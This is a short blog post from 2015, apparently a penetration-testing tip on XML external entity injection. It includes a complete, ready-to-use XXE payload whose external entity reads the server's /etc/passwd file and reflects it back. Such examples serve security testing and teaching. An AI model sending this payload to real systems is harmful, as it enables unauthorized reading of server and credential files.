Sunday, December 27, 2015

xml external entity injection



If XML files are processed and fields are reflected somewhere, always worth to check if entity injection works.

Example

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>